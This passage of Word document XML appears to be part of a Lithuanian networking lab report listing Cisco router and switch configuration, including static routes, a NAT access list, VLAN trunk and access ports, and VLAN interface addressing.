        <w:t>ip route 192.168.3.0 255.255.255.0 192.168.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D49E1F" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 192.168.5.0 255.255.255.252 192.168.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71581096" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 192.168.6.0 255.255.255.0 192.168.10.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBEBEC9" w14:textId="74C2D451" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip flow-export version 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6434C" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip access-list standard FOR-NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719739EA" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>permit 192.168.2.0 0.0.0.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5946D7D0" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>permit 192.168.3.0 0.0.0.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00756FA2" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>permit 192.168.4.0 0.0.0.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761DEF2C" w14:textId="40E25025" w:rsidR="2E75989E" w:rsidRPr="005A5C28" w:rsidRDefault="7C9512D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>permit 192.168.6.0 0.0.0.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C2A10" w14:textId="504BB9C3" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8E71A5" w14:textId="0F8D18D5" w:rsidR="3A2F46A2" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Komutatorius L3. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Multilayer Switch</w:t>
      </w:r>
      <w:r w:rsidR="571F232B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A497B1E" w14:textId="18105F17" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DB44D8" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38308D21" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk allowed vlan 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AABE911" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk encapsulation dot1q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066D2999" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode trunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CCDA6B" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B537B" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport access vlan 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9338F" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE028D" w14:textId="769CE110" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport nonegotiate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF9D8F" w14:textId="56775F8F" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C5DAC" w14:textId="3212DE04" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk allowed vlan 2-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A54F7A" w14:textId="130FA178" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk encapsulation dot1q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A51F9" w14:textId="73F61E98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport mode trunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D33C013" w14:textId="52501192" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB5085" w14:textId="6C44D900" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk allowed vlan 2-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B58143" w14:textId="7CE5F292" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport trunk encapsulation dot1q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AACDBD5" w14:textId="73F61E98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>switchport mode trunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D283E29" w14:textId="413B5335" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface Vlan1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5673728C" w14:textId="0B3076F6" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>no ip address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA3E942" w14:textId="73F61E98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FFC2D" w14:textId="4C819208" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface Vlan2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CEB12" w14:textId="63176584" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mac-address 00e0.f701.7201</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94DDF2" w14:textId="2A8F1710" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.2.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A605BD1" w14:textId="73F61E98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip helper-address 192.168.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18131FBB" w14:textId="6507FD4F" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface Vlan3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13C2A6" w14:textId="03FB8505" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mac-address 00e0.f701.7202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1291F988" w14:textId="4AA8E549" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.3.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387FADEC" w14:textId="73F61E98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip helper-address 192.168.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D90886" w14:textId="6CBF4388" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface Vlan4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F558E6" w14:textId="69213A34" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mac-address 00e0.f701.7203</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18442D56" w14:textId="73F61E98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.4.1 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A3D7B" w14:textId="6174FA98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface Vlan5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532C095" w14:textId="67918752" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mac-address 00e0.f701.7204</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A67C468" w14:textId="73F61E98" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 192.168.5.2 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCFD9C7" w14:textId="0B37531D" w:rsidR="321CAA2D" w:rsidRPr="005A5C28" w:rsidRDefault="62C7C744" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip route 0.0.0.0 0.0.0.0 192.168.5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26769523" w14:textId="02FDA918" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF2BECA" w14:textId="4C969296" w:rsidR="41EC134C" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Komutatorius1. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A065825" w14:textId="46CF8543" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4626DCC7" w14:textId="3A9F7718" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface FastEthernet0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69195A4C" w14:textId="19692296" w:rsidR="45E38913" w:rsidRPr="005A5C28" w:rsidRDefault="5D438E47" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>switchport access vlan 3</w:t>
